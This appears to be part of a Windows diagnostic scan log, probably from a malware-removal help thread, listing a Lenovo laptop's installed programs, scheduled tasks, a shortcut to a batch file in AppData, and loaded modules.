ESSTUTOR (x32 Version: 3.00.0020.0001 - Eastman Kodak Company) Hidden

ESSvpaht (x32 Version: 3.00.0017.0000 - Eastman Kodak) Hidden

ESSvpot (x32 Version: 3.00.0017.0002 - Eastman Kodak) Hidden

Evernote v. 4.2.3 (HKLM-x32\...\{F761359C-9CED-45AE-9A51-9D6605CD55C4}) (Version: 4.2.3.15 - Evernote Corp.)

FormsComponent (x32 Version: 16.00.0000 - UPS) Hidden

FOSS (x32 Version: 16.00.0500 - UPS) Hidden

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.59 - Google Inc.)

Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.7619.1252 - Google Inc.)

Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden

Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden

GWX Control Panel (HKLM-x32\...\UltimateOutsider_GwxControlPanel) (Version: - UltimateOutsider)

HP Photosmart 5520 series Basic Device Software (HKLM\...\{68C0736C-3E47-43A6-B14D-236BEF198A5F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)

HP Photosmart 5520 series Help (HKLM-x32\...\{7137E26A-10F7-4B1C-9980-0893579E92DA}) (Version: 27.0.0 - Hewlett Packard)

HP Photosmart 5520 series Product Improvement Study (HKLM\...\{DCC176F0-3CE3-4DA9-8FF9-3809C1B48C47}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)

HP Photosmart 6510 series Basic Device Software (HKLM\...\{1952AED6-2908-418F-B9D8-AC359651F92D}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)

HP Photosmart 6510 series Help (HKLM-x32\...\{A2F95F8C-CDA9-4B08-BAD1-CA9656E4EC14}) (Version: 140.0.2.2 - Hewlett Packard)

HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard)

ICCHelp (HKLM-x32\...\{A5763105-D1D5-4862-A3FE-EC058F9AA73E}) (Version: 1.0.0.2 - UPS)

Integrated Camera (HKLM-x32\...\{ADE16A9D-FBDC-4ecc-B6BD-9C31E51D0332}) (Version: 5.13.312.3 - Vimicro)

Intel AppUp® center (HKLM-x32\...\Intel AppUp® center 41900) (Version: 3.8.0.41900.72 - Intel)

Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)

Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2843 - Intel Corporation)

Intel® PROSet/Wireless for Bluetooth® + High Speed (HKLM\...\{90F00673-A276-4A58-B675-B426D39D1E09}) (Version: 15.3.0.0398 - Intel Corporation)

Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{A10B1524-63B5-40F2-B272-D841CF671C16}) (Version: 2.2.0.0266 - Intel Corporation)

Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)

Intel® Update Manager (x32 Version: 1.0.0.36888 - Intel Corporation) Hidden

Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.5.235 - Intel Corporation)

Intel® WiDi (HKLM\...\{23D486D4-FBE0-40F3-A245-E4D56D094764}) (Version: 3.5.41.0 - Intel Corporation)

Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version: - )

Intel® PROSet/Wireless WiFi Software (HKLM\...\{ECE5B218-A086-4E18-A362-D11181681457}) (Version: 15.03.1000.1637 - Intel Corporation)

Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Kodak EasyShare software (HKLM-x32\...\{D32470A1-B10C-4059-BA53-CF0486F68EBC}) (Version: - Eastman Kodak Company)

KSU (x32 Version: 612.7.0008.0000 - Eastman Kodak Compnay) Hidden

Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 2.01 - )

Lenovo Patch Utility (HKLM-x32\...\{6E6E7725-C7BC-4C39-8B3F-14B67331A120}) (Version: 1.3.0.9 - Lenovo Group Limited)

Lenovo Patch Utility (x32 Version: 1.3.2.4 - Lenovo Group Limited) Hidden

Lenovo Patch Utility 64 bit (HKLM\...\{ABE4638D-D208-4061-9F26-E3E11E3A1E0C}) (Version: 1.3.1.1 - Lenovo Group Limited)

Lenovo Patch Utility 64 bit (Version: 1.3.2.4 - Lenovo Group Limited) Hidden

Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.00.02 - )

Lenovo Registration (HKLM-x32\...\{6707C034-ED6B-4B6A-B21F-969B3606FBDE}) (Version: 1.0.3 - Lenovo Inc.)

Lenovo Solution Center (HKLM\...\{B73D2BF9-2C82-40A4-AFA8-32CE2E501640}) (Version: 2.2.002.00 - Lenovo Group Limited)

Lenovo Solutions for Small Business (HKLM-x32\...\{6A6D86CD-B004-46b7-8951-7BB75A776F8C}) (Version: 2.0.32.7350 - Intel® Corporation)

Lenovo Solutions for Small Business Customizations (HKLM-x32\...\{AFD7B869-3B70-40C7-8983-769256BA3BD2}) (Version: 2.0.0004.00 - Lenovo Group Limited)

Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.02.0018 - Lenovo)

Lenovo User Guide (HKLM-x32\...\{13F59938-C595-479C-B479-F171AB9AF64F}) (Version: 1.0.0009.00 - Lenovo Group Limited)

Lenovo Warranty Information (HKLM-x32\...\{FD4EC278-C1B1-4496-99ED-C0BE1B0AA521}) (Version: 1.0.0005.00 - Lenovo)

Lenovo Welcome (HKLM-x32\...\{2DC26D10-CC6A-494F-BEA3-B5BC21126D5E}) (Version: 3.1.0022.00 - Lenovo Group Limited)

Local Temperature (HKU\S-1-5-21-2430109965-1150345540-996092904-1000\...\Local Temperature) (Version: 1.0.0.1 - Local Temperature LLC)

MergeModule_x64 (Version: 9.3.00 - Sony Corporation) Hidden

MergeModule_x86 (x32 Version: 9.3.00 - Sony Corporation) Hidden

Message Center Plus (HKLM\...\{3849486C-FF09-4F5D-B491-3E179D58EE15}) (Version: 3.1.0004.00 - Lenovo Group Limited)

Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)

Microsoft Flight Simulator 2004 A Century of Flight (HKLM-x32\...\Flight Simulator 9.0) (Version: 9.0 - Microsoft)

Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)

Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4454.1510 - Microsoft Corporation)

Microsoft Office 2000 SR-1 Professional (HKLM-x32\...\{00010409-78E1-11D2-B60F-006097C998E7}) (Version: 9.00.3821 - Microsoft Corporation)

Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)

Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version: - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)

Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)

Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Mozilla Firefox 49.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 en-US)) (Version: 49.0.1 - Mozilla)

Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.1 - Mozilla)

MSIChecker (x32 Version: 9.00.0000 - UPS) Hidden

MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)

MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)

NA1Messenger (x32 Version: 16.00.0000 - Your Company Name) Hidden

Nitro Pro 8 (HKLM\...\{32A771F0-0BA3-44F4-B117-C556D38CA6CF}) (Version: 8.5.2.2 - Nitro)

Norton Security with Backup (HKLM-x32\...\NSBU) (Version: 22.8.0.50 - Symantec Corporation)

Notifier (x32 Version: 3.00.0006.0000 - Eastman Kodak Company) Hidden

NRF (x32 Version: 16.00.0000 - UPS) Hidden

On Screen Display (HKLM\...\OnScreenDisplay) (Version: 7.12.00 - )

OTtBP (x32 Version: 3.00.0007.0000 - Eastman Kodak Company) Hidden

PlayMemories Home (HKLM-x32\...\{94F4815B-755A-4FFA-AFDC-EE8FE776981E}) (Version: 5.1.00.12260 - Sony Corporation)

PMB_ModeEditor (x32 Version: 9.3.00 - Sony Corporation) Hidden

PMB_ServiceUploader (x32 Version: 10.1.00 - Sony Corporation) Hidden

PolicyManager (x32 Version: 16.00.0000 - UPS) Hidden

Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.55 - )

PowerDVD Create (HKLM-x32\...\InstallShield_{DE485075-8CD3-4A1E-9ABC-6412EBA44872}) (Version: 10.0 - CyberLink Corp.)

PowerDVD Create 10 (x32 Version: 10.0.1.2704 - CyberLink Corp.) Hidden

QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)

RapidBoot HDD Accelerator (HKLM-x32\...\Fastboot) (Version: 1.0.5.11 - Lenovo)

Realtek Card Reader (HKLM-x32\...\{F0A8BF4A-972F-41E0-9800-1EFE3BF28266}) (Version: 6.2.9200.29064 - Realtek Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.61.612.2012 - Realtek)

Reconciler (x32 Version: 16.00.0000 - UPS) Hidden

ReportServer (x32 Version: 16.00.0000 - Your Company Name) Hidden

SFR (x32 Version: 3.00.0010.0000 - Eastman Kodak Company) Hidden

SFR2 (x32 Version: 3.00.0004.0000 - Eastman Kodak Company) Hidden

Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)

SugarSync Manager (HKLM-x32\...\SugarSync) (Version: 1.9.80.99066 - SugarSync, Inc.)

SupportUtility (x32 Version: 16.00.0000 - Your Company Name) Hidden

System (x32 Version: 16.00.0000 - UPS) Hidden

ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.5.0.6 - )

ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.01 - Lenovo)

ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.77.0.26 - Lenovo)

ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 3.0.45.0 - Lenovo)

UnifiedPrinting (x32 Version: 16.00.0000 - UPS) Hidden

UPS WorldShip (HKLM-x32\...\UPS WorldShip) (Version: 15.0 - UPS)

UPSDB (x32 Version: 16.00.0000 - UPS) Hidden

UPSICC (x32 Version: 16.00.0000 - UPS) Hidden

UPSlinkHTTP (x32 Version: 1.0.0.13 - UPS) Hidden

UPSVC2008MM (x32 Version: 1.00.0000 - UPS) Hidden

UPSVCMM (x32 Version: 12.00.0000 - UPS) Hidden

USB MassStorage CardReader (HKLM-x32\...\040a_5005) (Version: - )

WaveEditor (x32 Version: 1.0.1.4514 - CyberLink Corp.) Hidden

WebHelp (HKLM-x32\...\{8C5BD501-AD5D-4A75-9321-076509B438FC}) (Version: 1.00.0000 - UPS)

Windows Driver Package - Intel (iaStor) hdc (06/12/2012 11.1.5.1001) (HKLM\...\46121420FA2D792F90F1449A0ED0EB2746A379C9) (Version: 06/12/2012 11.1.5.1001 - Intel)

Windows Driver Package - Lenovo 1.66.00.22 (11/30/2012 1.66.00.22) (HKLM\...\16E722986C4293F5D6BF43595DFFD631398D5F21) (Version: 11/30/2012 1.66.00.22 - Lenovo)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

WorldShip (x32 Version: 16.00.0000 - UPS) Hidden

WSShared (x32 Version: 16.00.0000 - UPS) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2430109965-1150345540-996092904-1000_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)

CustomCLSID: HKU\S-1-5-21-2430109965-1150345540-996092904-1000_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Intel\IntelAppStore\bin\npAppUp_x64.dll (Intel)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0419CAD1-8CC9-4145-99D2-DF3C22673282} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2013-06-26] (Lenovo Group Limited)

Task: {0A47B66E-24DF-4C8C-B2C7-9B3B364F0D44} - System32\Tasks\{5E46A44A-3F14-4A96-9D1C-70C486C892C9} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {0CE82064-77AF-408E-842C-3D6B601C7077} - System32\Tasks\{5B01BB45-7AAE-4C68-9F67-48868AF66FE3} => pcalua.exe -a C:\Users\Dwight\Downloads\install_kodak_easyshare.exe -d C:\Users\Dwight\Desktop

Task: {0DC63B3B-FE2B-4320-9B8D-BC06A334F828} - System32\Tasks\Microsoft_Hardware_Launch_mousekeyboardcenter_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\mousekeyboardcenter.exe [2013-05-13] (Microsoft)

Task: {1079BBFB-0DCF-4CF7-842E-38A59DFFCEFF} - System32\Tasks\Lenovo\LSC\LSCHardwareScanPostpone => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2013-08-08] ()

Task: {3453DFA1-3604-45FA-893E-9F888432F848} - System32\Tasks\{13933DEE-28D7-47FA-888B-6F47EEF80BCC} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {40609917-41D2-4349-8C47-0938686666E2} - System32\Tasks\Intel\Intel Service Manager => C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe [2013-03-25] (Intel Corporation)

Task: {40EB784E-3F98-4F80-8B29-673A1CE05A5F} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2013-06-26] ()

Task: {41C32BD6-0C61-4E2B-B72B-FEB287121778} - System32\Tasks\Lenovo\Message Center Plus Launcher => C:\Program Files (x86)\Lenovo\message center plus\mcplaunch.exe [2012-05-15] (Lenovo)

Task: {45730972-932B-4ECB-89AA-9AEA78EF5E60} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\WSCStub.exe [2016-09-23] (Symantec Corporation)

Task: {489D5811-98D6-4BB5-8013-8C331806E669} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-10-16] (Google Inc.)

Task: {514F9566-6459-40DF-B2DA-EE3F6350667F} - System32\Tasks\Games\UpdateCheck_S-1-5-21-2430109965-1150345540-996092904-1000

Task: {5218F459-9E61-4723-B4E8-DC7B1BD75BD9} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe [2016-09-23] (Symantec Corporation)

Task: {5747093A-8132-4D60-A48F-BEACC9C1239E} - System32\Tasks\{68BAF5A7-689D-4541-9CC0-E65FE8355B4F} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {5F032034-1EBE-4B19-8CFB-2C6749D3672A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2013-08-08] (Lenovo)

Task: {64150110-A385-4CAA-9EE3-10B291789731} - System32\Tasks\Lenovo\LSC\LSCHardwareScan => C:\Program Files\Lenovo\Lenovo Solution Center\LSC.exe [2013-08-08] ()

Task: {69616145-7A2D-4A23-9120-56EF1069978D} - System32\Tasks\Lenovo\Lenovo Solution Center Launcher => C:\Program Files\lenovo\lenovo solution center\App\LSCService.exe [2013-08-08] (Lenovo)

Task: {6DEBD367-7C4E-4741-89E6-54BEB0696881} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-10-16] (Google Inc.)

Task: {74D1AB5E-70EF-446A-BAA9-CC1437D6631A} - System32\Tasks\{1AA863E6-9BF0-4B4C-900C-A161FAF65A39} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {7BAE176E-CEFA-442B-B7F7-9E77219BAA99} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {7C7A6780-09BB-4A0B-8BB3-082DA645E3D2} - System32\Tasks\HPCustParticipation HP Photosmart 5520 series => C:\Program Files\HP\HP Photosmart 5520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)

Task: {7EBB2E87-91F0-44B8-B6CB-F3F30B84E8B2} - System32\Tasks\{18EFB396-51C3-49EB-905B-CDAB3D815F08} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {8796043F-7BD0-42E6-A0D8-8B78F5BDE8BC} - System32\Tasks\Microsoft\Windows\PLA\LSC Memory => Rundll32.exe C:\Windows\system32\pla.dll,PlaHost "LSC Memory" "$(Arg0)"

Task: {8A6EEA6F-EDE5-4D0D-8754-1896D3604FFB} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-12] (Adobe Systems Incorporated)

Task: {8AB0DACA-4DB2-4EAC-B345-0704395C0F96} - System32\Tasks\Microsoft_MKC_Logon_Task_itype.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)

Task: {ABC78E78-FADC-4F18-B0B0-3BBCD0B7E818} - System32\Tasks\CLMLSvc => C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvc.exe [2013-03-07] (CyberLink)

Task: {B03DF21D-6D12-4E85-8B56-3428A96F752D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)

Task: {BE232874-43D8-45F3-83A5-EBC968A09942} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()

Task: {C3C280BA-86D4-4AD5-BF45-E28D72E883B4} - System32\Tasks\Norton Security with Backup\Norton Error Processor => C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)

Task: {C78F1A2F-9824-4943-8353-48310CC0181A} - System32\Tasks\StartPowerDVDService => C:\PROGRAM FILES (x86)\Cyberlink\PowerDVD10\PDVD10Serv.exe [2013-03-19] (CyberLink Corp.)

Task: {D5F421D1-732F-483B-9663-6E49E7D7F5B7} - System32\Tasks\Microsoft_Hardware_Launch_itype_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\itype.exe [2013-05-13] (Microsoft Corporation)

Task: {D81D9A4F-7A31-4CEB-AC21-B8252764144F} - System32\Tasks\{22BE9FDC-6B30-4D59-ABD6-E5E4DE6F7E16} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {D98FB2A6-831E-4696-AD0A-36BC2B8DE89B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-08-26] (Piriform Ltd)

Task: {DA41EE8D-5AB3-4344-9C2B-E68883791BD7} - System32\Tasks\Microsoft_Hardware_Launch_ipoint_exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)

Task: {E4B6E730-82DF-4FFC-812E-010A41991904} - System32\Tasks\Microsoft_MKC_Logon_Task_ipoint.exe => c:\Program Files\Microsoft Mouse and Keyboard Center\ipoint.exe [2013-05-13] (Microsoft Corporation)

Task: {E9434AC8-62F9-47E2-BFB8-C46FC1B600BA} - System32\Tasks\Intel® Small Business Advantage\Notifier => C:\Program Files\Intel\Intel® Small Business Advantage\UI\SBA_Notifier.exe [2013-04-10] (Intel Corporation)

Task: {F1A3A0DD-092D-4B58-B96E-741B9A5D7433} - System32\Tasks\{96ED7D7F-8778-4F7D-AAE4-1EA18D42FC2F} => C:\Program Files (x86)\Microsoft Games\Flight Simulator 9\fs9.exe [2004-10-12] (Microsoft Corporation)

Task: {FA37EE6A-5FBB-4A04-BE75-A87889A01CEB} - System32\Tasks\Norton Security with Backup\Norton Error Analyzer => C:\Program Files (x86)\Norton Security with Backup\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Dwight\AppData\Local\20e01\f601d.lnk -> C:\Users\Dwight\AppData\Local\20e01\3a696.bat ()

==================== Loaded Modules (Whitelisted) ==============

2015-03-06 17:25 - 2013-10-23 16:24 - 00087600 _____ () C:\Windows\System32\cpwmon64.dll

2013-07-31 08:19 - 2013-06-26 06:55 - 00094208 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL

2003-02-04 08:22 - 2003-02-04 08:22 - 00181312 _____ () C:\Windows\SysWOW64\ScsiAccess.EXE

2013-07-31 08:12 - 2012-08-25 04:02 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll

2013-07-31 08:17 - 2010-10-26 00:40 - 00049056 _____ () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe

2002-03-13 05:08 - 2002-03-13 05:08 - 00016384 _____ () C:\Program Files (x86)\Kodak\KODAK Software Updater\7288971\Program\backWeb-7288971.exe

2013-03-07 05:15 - 2013-03-07 05:15 - 00030744 _____ () C:\UPS\WSTD\UPSNA1Msgr.exe

2016-10-17 10:50 - 2016-10-12 01:56 - 02367080 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.59\libglesv2.dll

2016-10-17 10:50 - 2016-10-12 01:56 - 00107112 _____ () C:\Program Files (x86)\Google\Chrome\Application\54.0.2840.59\libegl.dll

2013-07-31 08:22 - 2012-11-21 05:49 - 00033072 ____N () C:\Program Files (x86)\Lenovo\RapidBoot HDD Accelerator\FBServiceps.dll

2013-08-10 16:58 - 2011-08-02 20:58 - 02201088 _____ () C:\Program Files\Lenovo\Communications Utility\cxcore210.dll

2013-08-10 16:58 - 2011-08-02 20:58 - 02085888 _____ () C:\Program Files\Lenovo\Communications Utility\cv210.dll

2013-03-18 17:26 - 2013-03-18 17:26 - 00092456 _____ () C:\Program Files (x86)\Lenovo\Access Connections\AcWrpc.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00322048 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\log4cplus.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00400384 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\sqlite3.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00016896 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\featureController.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00062976 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\osEvents.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00195584 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\libgsoap.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00062464 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\zlib1.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00020480 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\eventsSender.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00446976 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\deviceProfile.dll

2013-07-31 08:26 - 2013-03-25 17:08 - 00064512 _____ () C:\Program Files (x86)\Intel\IntelAppStore\bin\serviceManagerStarter.dll

2013-03-07 00:49 - 2013-03-07 00:49 - 00626240 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll

2013-03-07 00:52 - 2013-03-07 00:52 - 00015424 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll

2002-03-13 04:56 - 2002-03-13 04:56 - 00049152 _____ () C:\Program Files (x86)\Kodak\Kodak Software Updater\7288971\6.1.4.37-7288971L\Program\clntutil.dll

2002-03-13 05:08 - 2002-03-13 05:08 - 00020480 _____ () C:\Program Files (x86)\Kodak\Kodak Software Updater\7288971\Program\BWfiles-7288971.dll

2002-03-13 04:54 - 2002-03-13 04:54 - 00143360 _____ () C:\Program Files (x86)\Kodak\Kodak Software Updater\7288971\6.1.4.37-7288971L\Program\BWfiles.dll

2002-03-13 05:09 - 2002-03-13 05:09 - 00020480 _____ () C:\Program Files (x86)\Kodak\Kodak Software Updater\7288971\Program\frext-7288971.dll

2002-03-13 04:57 - 2002-03-13 04:57 - 00094208 _____ () C:\Program Files (x86)\Kodak\Kodak Software Updater\7288971\6.1.4.37-7288971L\Program\frext.dll

2002-04-09 06:05 - 2002-04-09 06:05 - 00135168 _____ () C:\Program Files (x86)\Kodak\Kodak Software Updater\7288971\Program\BWTargetInf.dll

2013-03-07 03:27 - 2013-03-07 03:27 - 00045056 _____ () C:\UPS\WSTD\PolicyMgr\UPS.Components.NA1MessengerServer.dll

2013-03-07 02:44 - 2013-03-07 02:44 - 00018432 _____ () C:\UPS\WSTD\UPSResourceManager.dll

2013-03-07 03:12 - 2013-03-07 03:12 - 00057344 _____ () C:\UPS\WSTD\PolicyMgr\UPS.Components.PolicyHolder.dll

